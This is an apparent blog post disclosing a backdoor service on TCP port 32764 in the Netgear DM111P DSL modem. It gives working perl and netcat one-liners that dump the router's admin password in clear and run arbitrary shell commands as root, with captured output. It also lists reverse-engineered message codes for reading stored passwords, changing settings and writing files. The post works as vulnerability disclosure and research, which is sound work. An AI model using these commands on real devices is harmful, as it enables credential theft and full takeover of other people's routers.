Netgear DM111P backdoor?

After reading @elvanderb‘s tweet about a backdoor in his Linksys WAG200G, I checked my Netgear DM111P DSL modem (running firmware V2.00.27_WW) and found that TCP/32764 was opened and responding in a similar way.

The admin’s HTTP password is also exposed in clear through the scfgmgr process listening on TCP/32764:

$ perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.0.1 32764 \
| perl -n0e 'chomp;print"$_\n"' \
| grep ^http_

Output:

http_username=admin
http_password=***password*in*clear***
http_timeout=5

More important, is the ability to execute arbitrary shell commands as root (with a code 7 message)!

$ perl -e '$c="ps";print pack("(III)<", 0x53634d4d, 0x07, length($c)).$c' \
| nc 192.168.0.1 32764
MMcS?  PID  Uid        VSZ Stat Command
    1 root       1268 S   init       
    2 root            SW  [keventd]
    3 root            RWN [ksoftirqd_CPU0]
    4 root            SW  [kswapd]
    5 root            SW  [bdflush]
    6 root            SW  [kupdated]
    7 root            SW  [swapper]
    8 root            SW  [mtdblockd]
   55 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   56 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   57 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   65 root        628 S   /sbin/klogd 
  125 root       1148 S   dnrd -a 192.168.0.1 -m hosts -c off --timeout=0 -b 
  130 root        620 S   /usr/sbin/crond 
  131 root        652 S   /sbin/syslogd -f /etc/syslog.conf 
  133 root        868 S   /usr/sbin/scfgmgr 
  135 root        600 S   /usr/sbin/atm_monitor init 
  141 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
  142 root        596 S   /usr/sbin/cmd_agent_ap 
  143 root        596 S   /usr/sbin/pb_ap 
  137 root            SW  [autbtex]
  138 root            SW  [atm_led_complet]
  139 root            SW  [pmex_ne]
  140 root            SW  [pmex_fe]
  163 root       1268 S   init       
  165 root        672 S   /usr/sbin/mini_httpd -d /www -r NETGEAR DM111P  ADSL2
  228 root        612 S   /sbin/br2684ctld 
  755 root        996 S   /usr/sbin/scfgmgr 
  756 root       1268 S   sh -c ps 
  757 root       1272 R   ps

Further inspection:

List of message’s code for DM111P:

  • 1: Get all nvram variables (open/lseek/read on /tmp/nvram)(contains PPPoE passwords, HTTP admin password, etc.)
  • 2: Get a specific nvram variable (nvram_get)
  • 3: Set a specific nvram variable (parse string with strtok and call nvram_set)
  • 4: Commit nvram variables (nvram_commit)
  • 5: Reset WAN mode ? (nvram_set wan_mode=bridge, wan_encap=0, wan_vpi=8, wan_vci=81, and finally /usr/sbin/rc wan restart&)
  • 6: Get ADSL (up|down)stream speed %dKbps/%dKbps (fopen/fscanf on /tmp/adsl/downstream and /tmp/adsl/upstream/)
  • 7: Execute arbitrary commands through popen!!!
  • 8: Write content to /tmp/%s file
  • 9: Get version from /etc/version
  • 10: Get nvram value of variable lan_ipaddr
  • 11: Restore default nvram variables (nvram_set restore_default=1)
  • 12: fopen/fseek/fread on /dev/mtdblock/5?
  • 13: nvram_load followed by nvram_commit?
  • 14: Set firmware BOOT options? (execute /usr/sbin/fw_env %s %s through a system call)
  • 20: Get WAN interface MAC address? (nvram_get wan_macaddr_def)

Update:

Ce contenu a été publié dans code, network. Vous pouvez le mettre en favoris avec ce permalien.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*